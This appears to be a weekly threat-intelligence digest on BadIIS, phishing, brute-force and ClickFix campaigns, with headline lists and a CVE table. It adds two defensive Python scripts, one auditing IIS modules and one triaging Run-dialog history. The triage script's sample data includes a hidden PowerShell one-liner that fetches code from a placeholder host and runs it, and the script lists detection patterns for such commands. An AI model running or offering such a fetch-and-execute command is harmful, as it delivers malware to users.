Chinese-speaking threat actor manipulates SEO with BadIIS
In 2024, Trend Micro researchers observed the mass distribution of BadIIS in Asia as part of a search engine optimisation (SEO) fraud campaign targeting Internet Information Services (IIS) web servers. The most affected countries include India, Thailand, and Vietnam. The compromised IIS servers belong to governments, universities, technology companies, and telecommunications providers. The attackers exploit vulnerable IIS servers and install BadIIS, a malicious IIS module, on them. BadIIS tampers with the HTTP responses the server returns, injecting JavaScript that redirects visitors to sites under the attackers' control. Most of the observed variants redirect users to illegal gambling websites, but the researchers warned that the same mechanism could just as easily send visitors to servers hosting malware or phishing pages.
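A native IIS module such as BadIIS has to be registered in the server's global module list before IIS will load it, so that list is the first thing to check on a suspected server. The following is an added example, not Trend Micro's code and not BadIIS itself: it parses a constructed fragment of applicationHost.config (the module names, paths and the out-of-place "HttpModule" entry are made up for illustration, and C:\Windows is assumed for %windir%) and flags any module whose DLL lives outside the directories IIS's own modules ship in.

```python
"""Audit the native IIS modules registered in applicationHost.config.

Added example (not Trend Micro's code, not BadIIS). IIS loads native modules
from the <globalModules> section of
%windir%\\System32\\inetsrv\\config\\applicationHost.config, so a module whose
DLL sits outside the directories Microsoft's own modules ship in deserves a
closer look. The config below is a constructed fragment; the "HttpModule"
entry in C:\\Windows\\Temp is a hypothetical out-of-place module.
"""
import re
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

# Constructed applicationHost.config fragment (real files are much longer).
SAMPLE_CONFIG = r"""<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <globalModules>
      <add name="HttpLoggingModule" image="%windir%\System32\inetsrv\loghttp.dll" />
      <add name="StaticFileModule" image="%windir%\System32\inetsrv\static.dll" />
      <add name="DefaultDocumentModule" image="%windir%\System32\inetsrv\defdoc.dll" />
      <add name="RewriteModule" image="%SystemRoot%\system32\inetsrv\rewrite.dll" />
      <add name="ManagedEngine64" image="%windir%\Microsoft.NET\Framework64\v4.0.30319\webengine4.dll" preCondition="integratedMode,runtimeVersionv4.0,bitness64" />
      <add name="HttpModule" image="C:\Windows\Temp\HttpModule.dll" />
    </globalModules>
  </system.webServer>
</configuration>
"""

WINDIR = r"C:\Windows"  # assumed Windows directory; on a live host read %windir%

# Directories Microsoft's own IIS / ASP.NET native modules are installed in.
TRUSTED_DIRS = (
    PureWindowsPath(WINDIR, "System32", "inetsrv"),
    PureWindowsPath(WINDIR, "Microsoft.NET", "Framework", "v4.0.30319"),
    PureWindowsPath(WINDIR, "Microsoft.NET", "Framework64", "v4.0.30319"),
)

_ENV_VAR = re.compile(r"%(windir|systemroot)%", re.IGNORECASE)


def expand_windir(image: str, windir: str = WINDIR) -> str:
    """Expand %windir% / %SystemRoot% the way IIS would, case-insensitively."""
    return _ENV_VAR.sub(lambda _m: windir, image)


def is_under(path: PureWindowsPath, parent: PureWindowsPath) -> bool:
    """Case-insensitive check that `path` is `parent` or lies below it."""
    p = [part.lower() for part in path.parts]
    q = [part.lower() for part in parent.parts]
    return len(p) >= len(q) and p[: len(q)] == q


def list_global_modules(config_xml: str) -> list[tuple[str, str]]:
    """Return (name, image) for every <add> under <globalModules>."""
    root = ET.fromstring(config_xml)
    modules = []
    for section in root.iter("globalModules"):
        for add in section.findall("add"):
            modules.append((add.get("name", ""), add.get("image", "")))
    return modules


def suspicious_modules(config_xml: str) -> list[tuple[str, str]]:
    """Modules whose DLL directory is outside TRUSTED_DIRS."""
    flagged = []
    for name, image in list_global_modules(config_xml):
        path = PureWindowsPath(expand_windir(image))
        if not any(is_under(path.parent, d) for d in TRUSTED_DIRS):
            flagged.append((name, str(path)))
    return flagged


if __name__ == "__main__":
    for name, image in list_global_modules(SAMPLE_CONFIG):
        print(f"{name:24} {image}")
    print("\nOut-of-place modules:")
    for name, path in suspicious_modules(SAMPLE_CONFIG):
        print(f"  {name} -> {path}")
```

On a live server the same list comes from `Get-WebGlobalModule` in the WebAdministration PowerShell module or from `%windir%\System32\inetsrv\appcmd.exe list modules`; feed those names and paths into the same check. Legitimate third-party modules (for example ones installed under Program Files) will also be flagged, so extend TRUSTED_DIRS to match your build, and treat any remaining DLL that is unsigned or recently written as worth pulling for analysis.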
Facebook phishing campaign uses copyright infringement to harvest information
Check Point researchers identified a phishing campaign that impersonates Facebook to harvest credentials. The campaign began in December 2024 and has so far reached more than 12,279 email addresses across hundreds of companies in Europe, the United States, and Australia; versions of the lure were also found in Chinese and Arabic. The actors abuse Salesforce's automated mailing service without changing the sender identity, so the messages arrive from a legitimate Salesforce 'noreply' address. The emails carry a counterfeit Facebook logo and claim the recipient has violated copyright law. A link leads to a fake Facebook support page that prompts victims to enter their credentials.
Large-scale brute force attack campaign targets edge security devices
The Shadowserver Foundation warned of a large-scale brute-force campaign that uses around 2.8 million source IP addresses and has been active since at least January 2025. The campaign is guessing credentials for a wide range of edge networking devices, including ones from Palo Alto Networks, Ivanti, and SonicWall. The majority of the source addresses, about 1.1 million, are in Brazil, with large numbers also in Turkey, Russia, Argentina, Morocco, and Mexico. The addresses are spread across many networks and Autonomous Systems and are likely part of a botnet or of an operation built on residential proxy networks. Most of the attacking hosts are MikroTik, Huawei, Cisco, Boa, and ZTE routers and other Internet of Things devices.
DeepSeek ClickFix campaign delivers Vidar and Lumma Stealer
CloudSEK researchers observed threat actors exploiting the DeepSeek brand to run phishing campaigns that deliver infostealers such as Vidar Stealer and Lumma Stealer. The campaigns use investment-scheme lures together with the ClickFix technique. In one case a fake DeepSeek site advertises a supposed partnership programme; clicking its 'Verificate' button opens a fake CAPTCHA prompt that copies a malicious PowerShell command to the clipboard and instructs the user to paste it into the Windows Run dialog, so the victim launches the malicious command themselves. The fake domain was hosted behind Cloudflare, which the researchers say helped it evade detection by artificial-intelligence-based search engines.
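ClickFix leaves a small but reliable artefact on the victim host: Explorer records every command run from the Run dialog under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, as values named a, b, c ... holding the command text with a trailing "\1", and an MRUList value giving the most-recent-first order. The following added example (not CloudSEK's code) parses a constructed export of that key and scores each entry for the traits a paste-and-run PowerShell payload usually has; the "malicious" entry is a hypothetical lookalike built from those traits, not an indicator from the DeepSeek campaign, and example.invalid is a placeholder host.

```python
"""Triage Explorer's RunMRU key for ClickFix-style paste-and-run commands.

Added example, not CloudSEK's code. Explorer records each Win+R command under
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU as a REG_SZ
value named a, b, c ... with the text "<command>\\1"; the MRUList value lists
those names most-recent-first. The export below is constructed; the PowerShell
entry is a hypothetical lookalike of a ClickFix payload, not a real IOC.
"""
import re

# Constructed RunMRU export (value name -> data), as reg.exe would show it.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": (
        'powershell -w hidden -c "iwr http://example.invalid/ver | iex"'
        " # I am not a robot - reCAPTCHA Verification ID: 7811\\1"
    ),
}

# Binaries a pasted one-liner typically relies on.
LOLBINS = re.compile(
    r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|curl|certutil|msiexec|bitsadmin)(\.exe)?\b",
    re.IGNORECASE,
)

# (pattern, label): traits of a paste-and-run payload. Each hit adds one point.
INDICATORS = [
    (r"-w(indow(style)?)?\s+h(idden)?\b", "hidden window"),
    (r"-nop\b|-noprofile\b", "no profile"),
    (r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", "base64-encoded command"),
    (r"-ep\s+bypass|executionpolicy\s+bypass", "execution policy bypass"),
    (r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget)\b", "downloader cmdlet"),
    (r"\biex\b|invoke-expression", "invoke-expression"),
    (r"https?://", "remote URL"),
    (r"#.*(not a robot|captcha|verif)", "fake CAPTCHA comment trailer"),
]


def parse_runmru(values: dict[str, str]) -> list[str]:
    """Return Run-dialog commands most-recent-first, trailing '\\1' removed."""
    commands = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is None:
            continue
        commands.append(raw[:-2] if raw.endswith("\\1") else raw)
    return commands


def score_command(command: str) -> list[str]:
    """Labels of every indicator pattern the command matches."""
    return [label for pattern, label in INDICATORS if re.search(pattern, command, re.IGNORECASE)]


def suspicious_run_commands(values: dict[str, str], min_hits: int = 2) -> list[dict]:
    """Commands that invoke a LOLBIN and show at least `min_hits` payload traits."""
    findings = []
    for recency, command in enumerate(parse_runmru(values)):
        hits = score_command(command)
        if LOLBINS.search(command) and len(hits) >= min_hits:
            findings.append({"recency": recency, "command": command, "indicators": hits})
    return findings


if __name__ == "__main__":
    for finding in suspicious_run_commands(SAMPLE_RUNMRU):
        print(f"[{finding['recency']}] {finding['command']}")
        print("    indicators:", ", ".join(finding["indicators"]))
```

On a live host, pull the key with `reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"` (or from each user's NTUSER.DAT) and feed the values into parse_runmru. The Run dialog launches its target through explorer.exe, so a process-creation event (Sysmon Event ID 1 or Security Event 4688) showing explorer.exe as the parent of powershell.exe or mshta.exe is the complementary telemetry-side check.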
Phishing campaign targets travelers with arrival card lure to steal data
Cofense researchers detailed an ongoing phishing campaign that has targeted travelers to Singapore since at least September 2023 and has since expanded to travelers to Malaysia and the UK. The highly targeted emails claim that more information is required to complete an immigration arrival card application and link to a phishing page impersonating the website of Singapore's Immigration & Checkpoints Authority. Victims are asked to enter sensitive information, including credit card details, to pay a supposed processing fee. Parts of the fake portal are pre-filled with the victim's personally identifiable information to make it appear legitimate.
Ransomware
Volume of blog posts by operators during the last week.
China-Linked Espionage Tools Used in Ransomware Attacks – Symantec Enterprise Blogs – Feb 13 2025
XELERA Ransomware Campaign: Fake Food Corporation of India Job Offers Targeting Tech Aspirants – Seqrite Blog – Feb 12 2025
Babuk Impersonators Leverage a Brand Name & Previously Stolen Data to Engage in Re-Extortions – Analyst1 – Feb 11 2025
United States, Australia, and the United Kingdom Jointly Sanction Key Infrastructure that Enables Ransomware Attacks – US Department of the Treasury – Press Releases – Feb 11 2025
Police arrests 2 Phobos ransomware suspects, seizes 8Base sites – Bleeping Computer – Feb 10 2025
Abyss Locker Ransomware Attacking Critical Network Devices including ESXi servers – GBHackers On Security – Feb 06 2025
Financial Services
New Phishing Campaign Abuses Webflow, SEO, and Fake CAPTCHAs – Netskope – Threat Labs – Feb 12 2025
FinStealer Malware Targets Leading Indian Bank’s Mobile Users, Stealing Login Credentials – GBHackers On Security – Feb 11 2025
Hacker targets Indonesian banks with ransomware threats – Bne IntelliNews – Feb 10 2025
Fraudulent X Token and Phishing Websites in Crypto Scam Offering a Trip to Mars – TechNadu – Feb 08 2025
Google Tag Manager Skimmer Steals Credit Card Info From Magento Site – Sucuri Blog – Feb 06 2025
Geopolitics
The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operation – Microsoft Security Blog – Feb 12 2025
From South America to Southeast Asia: The Fragile Web of REF7707 – Elastic Security Labs – Feb 12 2025
Sandworm APT Exploits Trojanized KMS Tools to Target Ukrainian Users in Cyber Espionage Campaign – Securityonline.info – Feb 12 2025
Handala Hackers Claim Massive Data Breach on Israeli Police, Leak 350,000 Files – HackRead – Feb 10 2025
Owner of spyware used in alleged WhatsApp breach ends contract with Italy – The Guardian – Australia – Feb 06 2025
High Priority Vulnerabilities
| CVE | Software | Base Score | Temporal Score | Related |
|---|---|---|---|---|
| CVE-2025-24200 | iPadOS | 4.6 | 3.8 | Apple fixes zero-day exploited in ‘extremely sophisticated’ attacks |
| CVE-2025-21418 | Windows | 7.8 | 7.5 | Microsoft February 2025 Patch Tuesday fixes 4 zero-days, 55 flaws |
| CVE-2025-0994 | Cityworks | 8.8 | 6.9 | CISA Warns of Active Exploitation in Trimble Cityworks Vulnerability Leading to IIS RCE |
| CVE-2023-49103 | graphapi | 10.0 | 5.1 | ThinkPHP and ownCloud flaws actively exploited |
| CVE-2025-0282 | Neurons for ZTA gateways | 9.0 | 7.7 | Hackers Exploiting Ivanti Connect Secure RCE Vulnerability to Install SPAWNCHIMERA Malware |